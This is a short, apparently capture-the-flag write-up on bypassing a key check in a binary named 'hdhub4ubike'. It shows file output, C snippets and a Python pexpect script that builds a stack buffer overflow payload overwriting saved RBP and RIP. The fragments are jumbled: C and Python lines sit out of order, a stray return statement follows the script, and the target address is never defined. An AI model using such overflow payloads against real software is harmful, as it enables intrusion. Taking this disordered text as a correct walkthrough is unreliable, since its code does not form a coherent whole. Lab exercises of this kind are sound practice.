Hdhub4ubike
The goal is to obtain the flag without knowing the correct key.

2.1 File information

$ file hdhub4ubike
hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...
// compare with a secret stored in the .rodata section
if (strcmp(key, secret_key) != 0)
    return 0;
def main():
    p = pexpect.spawn(BIN, encoding='utf-8')
    p.expect("Enter your hub key:")
    # build payload
    payload = b'A' * 64                        # fill buffer
    payload += b'B' * 8                        # overwrite saved RBP
    payload += struct.pack("<Q", TARGET_ADDR)  # overwrite RIP
return 1;
// vulnerable read – no length limit!
read(0, buf, 0x100);   // <-- overflow possible
